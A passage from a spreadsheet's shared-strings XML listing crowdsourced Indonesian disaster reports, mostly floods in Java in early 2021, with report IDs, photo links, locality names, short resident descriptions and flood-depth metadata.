    <t>tolong TL masa banjir terus</t>
  </si>
  <si>
    <t>b6dc83b5-9852-47ee-9628-8bb678859530</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b6dc83b5-9852-47ee-9628-8bb678859530.jpg</t>
  </si>
  <si>
    <t>Jalan Yos Sudarso Kel. Paoman Kec. Indramayu Kab. Indramayu</t>
  </si>
  <si>
    <t>Paoman</t>
  </si>
  <si>
    <t>d70620c0-d71c-4517-8fed-0fdac40912a8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d70620c0-d71c-4517-8fed-0fdac40912a8.jpg</t>
  </si>
  <si>
    <t>Jalan cililitan kecil 2</t>
  </si>
  <si>
    <t>30b07bef-58f2-4e58-aa8e-f788e006f824</t>
  </si>
  <si>
    <t>Daerah bandar kedungmulyo</t>
  </si>
  <si>
    <t>Jombatan</t>
  </si>
  <si>
    <t>1258616b-1de6-4d18-8237-8664738963c4</t>
  </si>
  <si>
    <t>beberapa titik di lokasi tersebut air belum surut. ketinggian rata2 kisaran 20 sampai 40 cm.</t>
  </si>
  <si>
    <t>3055995d-27c9-4971-9b4c-accce357d30f</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 34, "report_type": "flood" }</t>
  </si>
  <si>
    <t>di lokasi tersebut masih terdapat titik genangan air. hingga saat ini ketinggian rata2 air 35 cm.</t>
  </si>
  <si>
    <t>Langenharjo</t>
  </si>
  <si>
    <t>Kota Kendal</t>
  </si>
  <si>
    <t>262c5bca-6482-4b14-ae69-e1fcf235fe8d</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 49, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir jalan bahagia dan angkatann 66</t>
  </si>
  <si>
    <t>1e3e3e68-d093-4a09-ad8c-bc562fd1d4d1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1e3e3e68-d093-4a09-ad8c-bc562fd1d4d1.jpg</t>
  </si>
  <si>
    <t>Banjir sudah 1 hampir 3 minggu tapi tidak ada bantuan dari BNPB atau pemerintah daerah gabus babelan. Setiap tahun banjir tdk ada bantuan</t>
  </si>
  <si>
    <t>Sukamekar</t>
  </si>
  <si>
    <t>Sukawangi</t>
  </si>
  <si>
    <t>5e39e2c4-ee5e-45ed-85c2-13203842f9b9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5e39e2c4-ee5e-45ed-85c2-13203842f9b9.jpg</t>
  </si>
  <si>
    <t>sudah 2 minggu air tidak mau surut</t>
  </si>
  <si>
    <t>Sungai Batang</t>
  </si>
  <si>
    <t>975fba8a-e763-40c6-b90e-4bfbbc1f68bb</t>
  </si>
  <si>
    <t>038b3a66-2435-4f74-8c7c-25585092abc2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/038b3a66-2435-4f74-8c7c-25585092abc2.jpg</t>
  </si>
  <si>
    <t>Banjernya sampai dapur</t>
  </si>
  <si>
    <t>Ketang Baru</t>
  </si>
  <si>
    <t>Singkil</t>
  </si>
  <si>
    <t>99cd85c9-8365-42ae-b1f7-d9833bd50bac</t>
  </si>
  <si>
    <t>Angin kencang debu berterbangan berbahaya bagi pengendara motor</t>
  </si>
  <si>
    <t>Bandar Jaya Timur</t>
  </si>
  <si>
    <t>Terbanggi Besar</t>
  </si>
  <si>
    <t>Lampung Tengah</t>
  </si>
  <si>
    <t>03699caf-e204-4e6a-9ddf-e11931bf1515</t>
  </si>
  <si>
    <t>https://images.petabencana.id/03699caf-e204-4e6a-9ddf-e11931bf1515.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "report_type": "volcano", "volcanicSigns": [ 4 ], "evacuationArea": true, "evacuationNumber": 3 }</t>
  </si>
  <si>
    <t>Diarea skitar banyuwangi banyak abu vulkanik</t>
  </si>
  <si>
    <t>Gunosari</t>
  </si>
  <si>
    <t>Tlogosari</t>
  </si>
  <si>
    <t>Bondowoso</t>
  </si>
  <si>
    <t>1ffbb833-c901-4859-b026-1f1c5fe0aae1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1ffbb833-c901-4859-b026-1f1c5fe0aae1.jpg</t>
  </si>
  <si>
    <t>Banjir selutut orang dewasa kerugian rumah rusak mobil untuk usaha grab rusak harus dibongkar. mohon keprihatin an nya untuk pihak aplikator"</t>
  </si>
  <si>
    <t>Tatah Belayung Baru</t>
  </si>
  <si>
    <t>09980a4d-f829-457e-a9d8-ba240dcf6d6a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/09980a4d-f829-457e-a9d8-ba240dcf6d6a.jpg</t>
  </si>
  <si>
    <t>Mendapat bantuan berupa baju bekas dari para relawan jember</t>
  </si>
  <si>
    <t>Jember Lor</t>
  </si>
  <si>
    <t>Patrang</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357762</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/02/09/1612858106913945213.jpg</t>
  </si>
  <si>
    <t>Banjir Rendam Jombang, Salah Satu SMAN Dijadikan Posko</t>
  </si>
  <si>
    <t>Posko banjir Brimob Jatim, Banjir yang melanda sejumlah desa di Kecamatan Bandar Kedungmulyo, Jombang, Senin (8/2/2021). Di kecamatan ini ada enam desa yang diterjang banjir. Dari enam desa tersebut, terdapat 12 dusun yang dihantam air bah. Tampak SMA ne</t>
  </si>
  <si>
    <t>Waduk</t>
  </si>
  <si>
    <t>Takeran</t>
  </si>
  <si>
    <t>Magetan</t>
  </si>
  <si>
    <t>62028af8-52f3-4079-b83e-4ba568922970</t>
  </si>
  <si>
    <t>https://images.petabencana.id/62028af8-52f3-4079-b83e-4ba568922970.jpg</t>
  </si>
  <si>
    <t>Daerah perbatasan karawang cikampek tepat nya depan pertamina cikmpek perumahan BMI banjiiirr</t>
  </si>
  <si>
    <t>Purwasari</t>
  </si>
  <si>
    <t>9fadf95b-f9c2-4d46-9c17-f79eb1f622cf</t>
  </si>
  <si>
    <t>Banjir di area bandar kedung mulyo</t>
  </si>
  <si>
    <t>Kayen</t>
  </si>
  <si>
    <t>118f9635-3625-4b9a-9671-3383ea34bcf2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/118f9635-3625-4b9a-9671-3383ea34bcf2.jpg</t>
  </si>
  <si>
    <t>Banjir di lingkungan 7 kompleks puskesmas teling tingkulu lembah</t>
  </si>
  <si>
    <t>Tingkulu</t>
  </si>
  <si>
    <t>Wanea</t>
  </si>
  <si>
    <t>32672985-e7ec-4c40-b165-b29ad6e8e876</t>
  </si>
  <si>
    <t>https://images.petabencana.id/32672985-e7ec-4c40-b165-b29ad6e8e876.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3353", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Kelurahan Muktiharjo kecamatan Genuk Semarang</t>
  </si>
  <si>
    <t>Muktiharjo Lor</t>
  </si>
  <si>
    <t>580cb3c7-133b-4c72-8224-fc27ee1212ce</t>
  </si>
  <si>
    <t>https://images.petabencana.id/580cb3c7-133b-4c72-8224-fc27ee1212ce.jpg</t>
  </si>
  <si>
    <t>Air luapan sungai di Tanggulangin menggenangi rumah penduduk sekitar</t>
  </si>
  <si>
    <t>c820121e-c1f5-4fc1-84db-b20ca4ae5a27</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c820121e-c1f5-4fc1-84db-b20ca4ae5a27.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 196 }</t>
  </si>
  <si>
    <t>Banjir bandang di tgl 4 Desember 2020 semua rumah di komplek De Flamboyan habis tenggelam terendam banjir bandang yang luar biasa.</t>
  </si>
  <si>
    <t>Tanjung Anom</t>
  </si>
  <si>
    <t>Pancur Batu</t>
  </si>
  <si>
    <t>fc17a410-3a59-4f57-9bdf-0e5f65041124</t>
  </si>
  <si>
    <t>BANJIR DI PERUMAHAN GRIYA RESTU CIKARANG, AKIBAT DARI TANGGUL PERUMAHAN GCC JEBOL, KEMUNGKINAN VOLUM AIR AKAN TERUS NAIK. MOHON UTK SEGERA D"</t>
  </si>
  <si>
    <t>Tunggakjati</t>
  </si>
  <si>
    <t>e0600a12-ec60-405c-8949-85922482342d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e0600a12-ec60-405c-8949-85922482342d.jpg</t>
  </si>
  <si>
    <t>Pertigaan terminal kudus ke arah timur ketinggian air mulai 20cm sampai 45cm, akses jalan untuk kendaraan kecil sudah di tutup</t>
  </si>
  <si>
    <t>Jati Wetan</t>
  </si>
  <si>
    <t>dd3200ba-f152-4ddd-b8dd-3721027ed006</t>
  </si>
  <si>
    <t>Banjir di kp. Tambun kelurahan karyamakmur kec.  Batujaya karawang</t>
  </si>
  <si>
    <t>Karyamakmur</t>
  </si>
  <si>
    <t>Batujaya</t>
  </si>
  <si>
    <t>f8ddec66-bc69-4869-9864-ce0bdf8e7b78</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 189 }</t>
  </si>
  <si>
    <t>Banjir variasi 50 cm sampai 200 cm</t>
  </si>
  <si>
    <t>05f3710a-747b-43d7-b7da-841b0480907c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/05f3710a-747b-43d7-b7da-841b0480907c.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 120, "report_type": "flood" }</t>
  </si>
  <si>
    <t>20823e20-95da-4f49-9ada-27c34ffe2fbd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/20823e20-95da-4f49-9ada-27c34ffe2fbd.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 183 }</t>
  </si>
  <si>
    <t>Bencana Banjir</t>
  </si>
  <si>
    <t>Pucang Simo</t>
  </si>
  <si>
    <t>fd69f49e-2127-4ebc-9416-db36984cc64d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fd69f49e-2127-4ebc-9416-db36984cc64d.jpg</t>
  </si>
  <si>
    <t>Banjir di rumah saya di pagaden kampung lebak sari kedalaman sampe 2 meter sampai rumah tenggelam sisa genteng kejadian pada hari minggu,</t>
  </si>
  <si>
    <t>Pagaden</t>
  </si>
  <si>
    <t>3ffac206-7231-4507-8bf5-afa1bb5e6ff4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3ffac206-7231-4507-8bf5-afa1bb5e6ff4.jpg</t>
  </si>
  <si>
    <t>Sungai Ciliwung meluap sejak hari Minggu sore</t>
  </si>
  <si>
    <t>4720ff13-dbf0-4514-b782-f33c997a0bd6</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3500", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Daerah genuksari banjir masih diatas lutut orang dewasa</t>
  </si>
  <si>
    <t>117072bc-0fe1-43d8-a29d-9ed1dc90b9b7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/117072bc-0fe1-43d8-a29d-9ed1dc90b9b7.jpg</t>
  </si>
  <si>
    <t>Banjir dikarenakan tingginya curah hujan di daerah kemas rindo tepatnya di RT.32. sudah hampir 4hari banjir menggenang."</t>
  </si>
  <si>
    <t>Kemas Rindo</t>
  </si>
  <si>
    <t>Kertapati</t>
  </si>
  <si>
    <t>f6e47ea8-228c-42d5-be03-52e5420d2da7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f6e47ea8-228c-42d5-be03-52e5420d2da7.jpg</t>
  </si>
  <si>
    <t>Terjebak di lantai 2, balita, suami &amp; istri sedang hamil 7 bulan</t>
  </si>
  <si>
    <t>493b2c7f-c2c9-49c9-b427-97ffe486e224</t>
  </si>
  <si>
    <t>https://images.petabencana.id/493b2c7f-c2c9-49c9-b427-97ffe486e224.jpg</t>
  </si>
  <si>
    <t>Terendam semala 3 hari</t>
  </si>
  <si>
    <t>Cikampek Utara</t>
  </si>
  <si>
    <t>9a32afd5-2aa5-4bdf-bc08-304606d516a2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9a32afd5-2aa5-4bdf-bc08-304606d516a2.jpg</t>
  </si>
  <si>
    <t>Diwilayah wingko sanggrahan banjir setinggi dada orang dewasa...</t>
  </si>
  <si>
    <t>Bajangrejo</t>
  </si>
  <si>
    <t>Banyu Urip</t>
  </si>
  <si>
    <t>3169abea-368f-4cfe-8e8c-5438f1d87d45</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3169abea-368f-4cfe-8e8c-5438f1d87d45.jpg</t>
  </si>
  <si>
    <t>Banjir menggenangi kawasan oemukiman limas krapyak</t>
  </si>
  <si>
    <t>e94eec6d-206d-43e5-9a99-274234fd7932</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e94eec6d-206d-43e5-9a99-274234fd7932.jpg</t>
  </si>
  <si>
    <t>banjir besar dengan kerusakan rumah ambruk dan longsor dan kehilangan barang barang seisi rumah</t>
  </si>
  <si>
    <t>737e9e73-9ce5-41dd-9d68-c3923fa5a43d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/737e9e73-9ce5-41dd-9d68-c3923fa5a43d.jpg</t>
  </si>
  <si>
    <t>Banjir Desa Pesanggrahan, Kab. Pekalongan</t>
  </si>
  <si>
    <t>Wonokerto</t>
  </si>
  <si>
    <t>b7b8391d-c3c2-4b53-8c90-4312b9bfc823</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b7b8391d-c3c2-4b53-8c90-4312b9bfc823.jpg</t>
  </si>
  <si>
    <t>Banjir menggenang diwilayah RT32, dikarenakan hujan deras. Mhn untuk ditanggapi.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Kes-3_JzMHlFSBohplg35GYVa_HD-Ri1EYOkxncIcQEJQJu7qZraf_zz6fhfTXgC9CSNHTlx4fCJaV2p76ehqjGGnJ9bTQwbm_s9KgjosxE=s480-c</t>
  </si>
  <si>
    <t>61bc7681-388b-4841-a442-c8a5c45767d1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/61bc7681-388b-4841-a442-c8a5c45767d1.jpg</t>
  </si>
  <si>
    <t>banjir besar dengan membawa kerusakan rumah ambruk dan se isi rumah hanyut</t>
  </si>
  <si>
    <t>Kaliwates</t>
  </si>
  <si>
    <t>5a06ffa1-7f90-45c8-baa8-21b6774f0c8a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5a06ffa1-7f90-45c8-baa8-21b6774f0c8a.jpg</t>
  </si>
  <si>
    <t>Banjir tahunan akibat luapan kali besar tanggulangin Kudus</t>
  </si>
  <si>
    <t>b0278042-64ed-4664-91cd-07a2ca42c32e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b0278042-64ed-4664-91cd-07a2ca42c32e.jpg</t>
  </si>
  <si>
    <t>308a72f7-1e0a-4f4f-8485-19e614739549</t>
  </si>
  <si>
    <t>https://images.petabencana.id/308a72f7-1e0a-4f4f-8485-19e614739549.jpg</t>
  </si>
  <si>
    <t>Jangga</t>
  </si>
  <si>
    <t>Losarang</t>
  </si>
  <si>
    <t>f7ba8b2f-d56b-452b-b7c5-5e4b9ef5224e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f7ba8b2f-d56b-452b-b7c5-5e4b9ef5224e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2661", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Minggu 08/02/2021 Jalan Moh Kahfi 2  Jagakarsa  Jakarta Selatan tergenang banjir setinggi 40 sampai 50 sentimeter"</t>
  </si>
  <si>
    <t>Bale Kambang</t>
  </si>
  <si>
    <t>93c2c65e-44c4-47c6-9ba7-e0e0b67e30e2</t>
  </si>
  <si>
    <t>Perumahan gramapuri persada cikarang</t>
  </si>
  <si>
    <t>Sukajaya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/HVadAjw9qtEX_OiOS83SOb9hHLfLm92QEY5MSU1ec_u_dkcWu7EIuLYUMh9GvzPM_pkF1slYJXAfGec7kn66sHkcXxqlaqu8p6tw5Jz2dw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1518", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>got mampet tertutupi sadimen</t>
  </si>
  <si>
    <t>24eae027-f885-4b5c-9ead-6fdef42c7e3d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/24eae027-f885-4b5c-9ead-6fdef42c7e3d.jpg</t>
  </si>
  <si>
    <t>Kamonji</t>
  </si>
  <si>
    <t>Palu Barat</t>
  </si>
  <si>
    <t>Palu</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/LYt__0Lci-z0iy8DQkqTY7kK3lVutIC-e4qIB_kfvWR-OyxD77psXIFo0deN_NxY2ocKtsEempg0KAZgbSwp2RA74vYVXUdlJy05vAm63HI=s480-c</t>
  </si>
  <si>
    <t>warga mengeluh jika hujan lebat, air hujan tdk mengalir sebagai mana mestinya . mengakibatkan banjir dikarenakan saluran tertutup oleh tanah . lokasi rt 009 dsk rw 03 . #BanjirKecil</t>
  </si>
  <si>
    <t>f5b96f13-b3c0-485b-948e-8d58f1876387</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f5b96f13-b3c0-485b-948e-8d58f1876387.jpg</t>
  </si>
  <si>
    <t>Ganung Kidul</t>
  </si>
  <si>
    <t>Nganjuk</t>
  </si>
  <si>
    <t>41ddb26b-c3e5-42e4-a978-f24150e4c6f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/41ddb26b-c3e5-42e4-a978-f24150e4c6f9.jpg</t>
  </si>
  <si>
    <t>Ini air masih terus naik kemungkinan ketinggian air bisa terus naik.</t>
  </si>
  <si>
    <t>Talun Kidul</t>
  </si>
  <si>
    <t>Sumobito</t>
  </si>
  <si>
    <t>a989601e-bdc5-46db-b00b-fce8235de3dc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a989601e-bdc5-46db-b00b-fce8235de3dc.jpg</t>
  </si>
  <si>
    <t>Foto tadi malam sekitar pukul 02.30 WIB. Tinggi air 60 cm, pagi ini sudah surut tinggal sekitar 40 cm</t>
  </si>
  <si>
    <t>Payaman</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Mj3oQo5oWpY2bEf-PZQg5DaGF6xizNK-AJyOJv80ho_cvPMErfPIAA5D1fPZOW0feCLy6QaxMzRMd_lp9UX6E2q2fvNiWTGhqlMip9-w=s480-c</t>
  </si>
  <si>
    <t>sepanjang got sampah nya tlg di kerk.. terima kasih</t>
  </si>
  <si>
    <t>1c0d45fa-6b4e-4c23-8331-47ccfedea355</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1c0d45fa-6b4e-4c23-8331-47ccfedea355.jpg</t>
  </si>
  <si>
    <t>Longsorr</t>
  </si>
  <si>
    <t>Ngetos</t>
  </si>
  <si>
    <t>81177ae3-5dd8-44a7-965a-1a1c18e8cd0e</t>
  </si>
  <si>
    <t>Emang tiap tahun sih sidokare sidoarjo banjir kalo musim hujan</t>
  </si>
  <si>
    <t>Sidokare</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/r62xX-Vu6W0dXUgITx6CZpFxZY_Hjd698kMxcQQ5I9fMuGCmxm2b3uJu-tXzfOCjF1cAR-6KY_7scWXqf0femcsf-0E1QyMsfNJBHhWGYA=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap di jalan cirebon kbn. Tolong benahi drainase yg buruk</t>
  </si>
  <si>
    <t>b3087cc6-025f-47a5-8279-991dcf6a2113</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b3087cc6-025f-47a5-8279-991dcf6a2113.jpg</t>
  </si>
  <si>
    <t>Banjir di daerah Kabupaten Nganjuk</t>
  </si>
  <si>
    <t>cb3b455b-b700-4eab-9d37-7aec290010b7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cb3b455b-b700-4eab-9d37-7aec290010b7.jpg</t>
  </si>
  <si>
    <t>Banjir di berbagai wilayah kab nganjuk dan tanah longsor di kec ngetos kab nganjuk</t>
  </si>
  <si>
    <t>30301079-e8cb-4e8e-bad7-580f9f2d6f42</t>
  </si>
  <si>
    <t>Semata kaki</t>
  </si>
  <si>
    <t>f5184ebf-4c5e-4186-a98f-afd597493725</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f5184ebf-4c5e-4186-a98f-afd597493725.jpg</t>
  </si>
  <si>
    <t>sudah biasanya air menggenang, hanya ini udah lumayan tinggi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/DDFN1xjrkQqBrzOFsj98xmH8iTn0BFSAcFPrB2OJ19JaNCDgdf7vbp0JQKi0naTgW3C8OTvRuaGpa1gO0TfVRDK_b36y2_cFZ47tUbcdEQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2081", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>rt10/rw01 kp.jati kel.jatinegara kaum kec.pulogadung banjirrr</t>
  </si>
  <si>
    <t>Jatinegara Kaum</t>
  </si>
  <si>
    <t>a6fd1c70-1641-4286-a5bc-2d25cdc871fe</t>
  </si>
  <si>
    <t>Airnya udah mulai naik</t>
  </si>
  <si>
    <t>d56127ab-dc26-4d4d-bc48-c0f34450f578</t>
  </si>
  <si>
    <t>Mulai banjir</t>
  </si>
  <si>
    <t>Kali Baru</t>
  </si>
  <si>
    <t>4e5620d4-e767-4ddf-a299-00942fd42697</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4e5620d4-e767-4ddf-a299-00942fd42697.jpg</t>
  </si>
  <si>
    <t>Dari Jam 02:00 banjir di harapan baru regency belum surut #banjir</t>
  </si>
  <si>
    <t>ed808578-14de-4df6-b383-8b9bdb79747e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ed808578-14de-4df6-b383-8b9bdb79747e.jpg</t>
  </si>
  <si>
    <t>#banjir harapan baru regency</t>
  </si>
  <si>
    <t>4787de54-e0d6-46da-ae87-e99bb96105a3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4787de54-e0d6-46da-ae87-e99bb96105a3.jpg</t>
  </si>
  <si>
    <t>Banjir dikarenakan hujan deras semalam berakibat air naik di depan rumah</t>
  </si>
  <si>
    <t>Bluru Kidul</t>
  </si>
  <si>
    <t>a21002e7-cbb1-437a-b4ad-a47a6a49d866</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a21002e7-cbb1-437a-b4ad-a47a6a49d866.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "volcano", "volcanicSigns": [ 4 ], "evacuationNumber": 3, "evacuationArea": true }</t>
  </si>
  <si>
    <t>Lereng Gunung Wilis di Nganjuk longsor dan menimbun 12 rumah, Minggu (14/2). Sebanyak 16 orang warga Dusun Selopuro, Ngetos, dilaporkan masi</t>
  </si>
  <si>
    <t>Nglurup</t>
  </si>
  <si>
    <t>Sendang</t>
  </si>
  <si>
    <t>Tulungagung</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/2_joVwwutwPW-7XjcPCZ_XjEPXBjAqEq1LOAWg1Q_6drZuSkuLLbqZtfYmMI9AFsM6cp6Wcynx_x7YzMyI8z1b1k2lNymCwK42iSAByZkQ=s480-c</t>
  </si>
  <si>
    <t>banjir tolong TL</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/4SRwZg-E6fY_CdvD1egU19XLgNcOYIP-8cE0fvLWvpm7DOjqlmACietf57ylzGfKnlscvxtUopmf5xhV68Jp2RLDvOV3yjWDLCwkR1YDSEk=s480-c</t>
  </si>
  <si>
    <t>#pantangberteduh apreasi untuk Ibu ini disaat masih hujan tetap menjaga agar tidak ada genangan."</t>
  </si>
  <si>
    <t>2c3bb9fa-4f0a-419a-b47f-9d0fc3ac857f</t>
  </si>
  <si>
    <t>c645eaca-722e-41ec-bed0-b898d116d976</t>
  </si>
  <si>
    <t>e40adb5a-98db-4756-b3f6-b1b7b7b48d7b</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357878</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/02/16/1613446903891989337.jpg</t>
  </si>
  <si>
    <t>Hujan Deras Sebabkan Jalan Kedoya Utara Terendam Air</t>
  </si>
  <si>
    <t>akibat hujan deras dari pagi, jalan dikedoya utara mengalami banjir sampai mata kaki. Dihimbau kapada pengendara sepeda motor tetap hati-hati. pukul 09.30 WIB</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/QnquL108nFwSVDlZolZkORiDTnDrik-hR1R6hywlhJg6lUkkN3SNjb7HITtjQ2fEvcZqRL5UWk63I64cWkGkwCzQibIuS7_mXFXey-im=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "139", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap Tolong benahi drainase yg buruk</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/jJlqQOjO7gkc5ZdhvFky9rN8rJmPQPhBGFFuBw3_fY3WnAJ0VlpM4OxIDLntH1KCgdQQUiDZkYfm7FjQcBR_I2mFgdI7OlE9m7a63V0t=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "76", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di kalideres, jln peta selatan, dekat jalan daan mogot</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/MSbwEjgs34QffeMZSLP5OtCLo5oSUcblIQSiErfsNL9yfrl1ct5uCCqfDj7-D-qHIEh3I5F8Hu5eIU3wwtra_arOOOczt-p5LI-y0J3A=s480-c</t>
  </si>
  <si>
    <t>#SaluranTersumbat</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xK3xAeSW936chbsjRWOfEQev8-VdxCSGoMVIt4prWBV1EjyToqQXnJb4L3sx3WJ-FlpzkVD6hFUxeLX25fQ-R6YGqA69qDQrTA-XF-44zA=s480-c</t>
  </si>
  <si>
    <t>#SaluranKotor klo hujan langsung tergenang... saluran banyak sampah dan lumpur..... #jalanmangga sekitar pasar lontar</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lpzvquFpv2ZqENoYTwql9l76Zp3Lb9hhkpbWZT5MfnvwHwBsehSVVdGdENrIMXKZbiUFi6ffyxIA75k0Z0KQO3jb1xeA_H3h815mr7Wf=s480-c</t>
  </si>
  <si>
    <t>banjir lagi, seluruh komplek loka permai cidodol</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/JeRQrgiyVXsGihyNwNhDzX6LyFBi5AmqY9g_6WiknbX-uHTU8Ph3vDEZy7MF4orEIuIZTZd3nDIObdshib_exDUol7Wb4-zXJ_Y_hGeBw4g=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "250", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tolong dong di atasi</t>
  </si>
  <si>
    <t>862cd97b-a43d-4dba-a20c-769c152bbf2d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/862cd97b-a43d-4dba-a20c-769c152bbf2d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "122", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Terjadi genangan/banjir di jl.kampung gaga Rt.06 Rw.04 kelurahan semanan kec.klide4es jakbar</t>
  </si>
  <si>
    <t>06249407-05ea-491f-a28e-3f263c48fdb4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/06249407-05ea-491f-a28e-3f263c48fdb4.jpg</t>
  </si>
  <si>
    <t>Banjir masih merendam perumahan villa Jatirasa ,kecamatan Jatiasih ,kota Bekasi.    Minggu (25/10/2020) pukul 8.30 WIB."</t>
  </si>
  <si>
    <t>Jatiluhur</t>
  </si>
  <si>
    <t>4aeb37a9-b399-4a4a-b41e-919c323d4c4e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4aeb37a9-b399-4a4a-b41e-919c323d4c4e.jpg</t>
  </si>
  <si>
    <t>Telah terjadi genangan/banjir di gang Haji saleh kampung gaga semanan Rt.05 Rw.09 kelurahan semanan kec.Kalideres jakarta barat</t>
  </si>
  <si>
    <t>b4b3da87-3049-4e08-9e47-efb01242aa6d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b4b3da87-3049-4e08-9e47-efb01242aa6d.jpg</t>
  </si>
  <si>
    <t>Lokasi komplek Kehakiman BPHN seberang Mall Balekota Kota Tangerang. Banjir masuk ke rumah dgn ketinggian air kurleb 50an cm.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/-V1TbKnFLiEcr55rZFPAoxngJqTSjJYVcQ905Hlj3ZWrQgn1udPJ1FPgahoOoxW5xbukDGJ4eKuHSKiNfg3CDojcxuHXgSgXDi-pUnIbNAo=s480-c</t>
  </si>
  <si>
    <t>tolong TL serius pemprov DKI</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/3kW4armGbb1igEoLGQ2apPihiPmynFSkwmYVjNm3TM2q0OuHo5_DjxmgOq0AnNivDyAquEBwpDLx2FvsMxl70kJJqoeM8QfJyEV6J5GLrA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2118", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap Akibat drainase yg buruk. Tolong benahi drainase</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/mBC7V14S1Wh7zD-q4uwmioEUgjPz_WZu6-vtU_yvnYBH0b1ZxsT1uIxxJpwTk506BrL6k9qW642SiPe0NLfp_w891H95kOqhzUAyrnKe=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil dpn bakmie kofei. Tolong di atasi</t>
  </si>
  <si>
    <t>4c4d2dfb-f890-4b8a-905b-19a04a88dbb6</t>
  </si>
  <si>
